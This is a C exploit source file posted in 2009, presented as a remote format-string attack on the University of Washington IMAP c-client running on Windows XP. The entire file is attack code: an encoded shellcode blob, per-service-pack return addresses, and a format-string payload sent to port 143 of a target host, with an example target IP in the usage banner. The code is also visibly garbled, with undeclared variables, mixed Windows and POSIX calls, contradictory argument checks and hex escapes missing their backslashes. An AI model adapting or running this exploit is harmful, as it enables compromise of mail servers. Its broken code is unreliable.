uwimap-format.txt
Posted on 20 February 2009
/* # This BUg Discover By Faryad Rahmany # C0d3d by Faryad rahmany # website : http://rahmany.net # University Of Washington IMAP c-client Remote FOrmat String # Shellcode based on work by vlad902 # Greets to my best Freind : DJ7xpl # UG : File Host Port Target # Target 1 : WIndows XP Sp 1 : 0 # Target 2 : Windows XP Sp 2 : 1 # Target 3 : Windows XP Sp 3 : 2 # Ep : Attack.exe 78.38.23.49 143 2 # Sp Thanks To : AllaH # compiled with visual c++ 6 : Attack.c */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #define PORT 143 #define DATAOVERFLOW 2024 int main(int argc, char *argv[]) { int sockfd, numbytes; unsigned int system; char buffer[DATAOVERFLOW]; char jmp[5]; struct hostent *he; struct sockaddr_in tcp;; struct sockaddr_in their_addr; char winxpsp1[] = "x57x94xAEx77"; // not tested char winxpsp2[] = "xEDx1Ex94x7C"; char winxpsp3[] = "x7Bx46x86x7C"; char FAR[] = "x47x45x54x20x2F"; WSADATA wsadata; unsigned char shellcode[] = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e" "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48" "x4ex56x46x32x46x42x4bx48x45x44x4ex43x4bx38x4ex57" "x45x50x4ax57x41x50x4fx4ex4bx38x4fx54x4ax41x4bx48" "x4fx55x42x32x41x30x4bx4ex49x34x4bx48x46x53x4bx48" "x41x30x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c" "x46x37x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx43x46x35x46x42x4ax52x45x47x45x4ex4bx48" "x4fx35x46x32x41x50x4bx4ex48x46x4bx58x4ex30x4bx34" "x4bx58x4fx35x4ex31x41x30x4bx4ex43x30x4ex42x4bx38" "x49x38x4ex36x46x52x4ex51x41x46x43x4cx41x53x4bx4d" "x46x56x4bx38x43x44x42x33x4bx58x42x44x4ex50x4bx58" "x42x47x4ex41x4dx4ax4bx58x42x34x4ax50x50x45x4ax56" "x50x58x50x54x50x50x4ex4ex42x45x4fx4fx48x4dx48x46" "x43x35x48x46x4ax36x43x53x44x53x4ax46x47x47x43x47" "x44x33x4fx55x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e" "x4ex4fx4bx33x42x55x4fx4fx48x4dx4fx55x49x58x45x4e" "x48x56x41x38x4dx4ex4ax50x44x50x45x35x4cx36x44x50" "x4fx4fx42x4dx4ax36x49x4dx49x30x45x4fx4dx4ax47x55" "x4fx4fx48x4dx43x45x43x55x43x45x43x45x43x35x43x54" "x43x55x43x54x43x55x4fx4fx42x4dx48x36x4ax56x41x31" "x4ex45x48x56x43x45x49x48x41x4ex45x59x4ax46x46x4a" "x4cx31x42x47x47x4cx47x35x4fx4fx48x4dx4cx56x42x51" "x41x35x45x35x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52" "x49x4ex47x35x4fx4fx48x4dx43x35x45x55x4fx4fx42x4d" "x4ax36x45x4ex49x34x48x58x49x34x47x55x4fx4fx48x4d" "x42x45x46x55x46x55x45x55x4fx4fx42x4dx43x49x4ax56" "x47x4ex49x47x48x4cx49x57x47x45x4fx4fx48x4dx45x35" "x4fx4fx42x4dx48x46x4cx36x46x46x48x46x4ax56x43x46" "x4dx46x49x48x45x4ex4cx56x42x35x49x35x49x32x4ex4c" "x49x58x47x4ex4cx36x46x54x49x48x44x4ex41x43x42x4c" "x43x4fx4cx4ax50x4fx44x44x4dx42x50x4fx44x54x4ex32" "x43x59x4dx58x4cx47x4ax53x4bx4ax4bx4ax4bx4ax4ax36" "x44x47x50x4fx43x4bx48x51x4fx4fx45x37x46x54x4fx4f" "x48x4dx4bx35x47x35x44x45x41x55x41x55x41x45x4cx56" "x41x50x41x45x41x55x45x35x41x35x4fx4fx42x4dx4ax46" "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx36" "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x55x4ex4f" "x43x38x46x4cx46x36x4fx4fx48x4dx44x35x4fx4fx42x4d" "x4ax46x42x4fx4cx38x46x50x4fx45x43x45x4fx4fx48x4d" "x4fx4fx42x4dx5a"; if(argc < 3){ printf("*********************************************** " " This BUg Discover By Faryad Rahmany " " C0d3d by Faryad rahmany " " website : http://rahmany.net " " University Of Washington IMAP c-client Remote FOrmat String " " Shellcode based on work by vlad902 " " Greets to my best Freind : DJ7xpl " " UG : File Host Port Target " " Target 1 : WIndows XP Sp 1 : 0 " " Target 2 : Windows XP Sp 2 : 1 " " Target 3 : Windows XP Sp 3 : 2 " " Ep : Attack.exe 78.38.23.49 143 2 " " Sp Thanks To : AllaH " " compiled with visual c++ 6 : Attack.c " "*********************************************** ", argv[1]); exit(-1); } printf(" Attack on University Of Washington IMAP c-client"); system = (unsigned short)atoi(argv[3]); switch(system) { case 1: strcat(jmp,winxpsp1); break; case 2: strcat(jmp,winxpsp2); break; case 3 : strcat(jmp,winxpsp3); break; default: printf(" this target not find this list and exit "); exit(-1); } printf(" building Format string "); memset(buffer,shellcode,DATAOVERFLOW); memcpy(buffer,shellcode,sizeof(shellcode)-1); memcpy(buffer+256,jmp,sizeof(jmp)-1); memcpy(buffer+243,FAR,sizeof(FAR)-1); buffer[DATAOVERFLOW] = 0; if (argc != 2) { fprintf(stderr,"usage: client hostname "); exit(1); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(1); } if ((!he) && (addr == INADDR_NONE) ){ printf("unable to resolve %s ",argv[1]); exit(-1); } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (!sock){ printf("Fuck socket error "); exit(-1); } printf(" Attack on University Of Washington IMAP c-client %s " , argv[1]) ; Sleep(900); printf(" pachet Send size = %d byte " , sizeof(buffer)); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); } if ( WSAStartup(wVersionRequested, &wsadata) ) { printf ("Erreur d'initialisation winsock ! "); ExitProcess (1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT); their_addr.sin_addr = *((struct in_addr *)he-h_addr); bzero(&(their_addr.sin_zero), 8); printf(" Sending exploit string... "); printf ("connecting to %s on port %u...", argv[1], ntohs ( sin.sin_port ) ); if (connect(sockfd, (struct sockaddr *)&their_addr, \nsizeof(struct sockaddr)) == -1) { perror("connect"); exit(1); } fprintf(FILEsock, "xebx29" "%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n%%n@@@@@@@@%s ", 0x3C63FF-0x4f,shellcode); if ((numbytes=recv(sockfd, buffer,DATAOVERFLOW, 0)) == -1) { perror("recv"); exit(1); } buffer[numbytes] = '�'; printf("Received: %s",buffer); shutdown(sockfd,1); closesocket(sockfd); } return 0; }
